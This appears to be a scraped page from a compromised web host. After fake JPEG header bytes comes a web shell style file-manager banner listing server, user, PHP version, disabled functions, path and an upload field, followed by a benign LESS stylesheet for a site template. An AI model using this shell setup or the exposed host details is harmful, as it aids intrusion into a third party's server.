ÿØÿà JFIF ` ` ÿþ
|
Server : Apache/2 System : Linux srv244.medyabim.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64 User : lionbursa ( 1773) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/lionbursa/public_html/style/less/less-mobilerepair/ |
Upload File : |
/*
* extra.less
* -----------------------------------------------
*/
/* -------- Heading Style ---------- */
.heading-border {
border-bottom: 1px solid @gray-lightgray;
margin: 30px 0;
padding: 20px 0;
}
/* -------- FullCalendar - Plugin ---------- */
.fc-day-number {
color: @black-333;
&.fc-other-month {
opacity: 0.4;
}
}
/* scrolltofixed-container */
.scrolltofixed-container {
position: static;
}
@media only screen and (max-width: 767px) {
.scrolltofixed-container .scrolltofixed {
position: static !important;
}
.scrolltofixed-container .scrolltofixed + div {
display: none !important;
}
}
/* slider revolution */
.tp-bannertimer {
z-index: 21;
}
.mfp-close-btn-in .mfp-close {
color: #fff;
font-size: 48px;
}
.mfp-bg {
z-index: 1112;
}
.mfp-wrap {
z-index: 1113;
}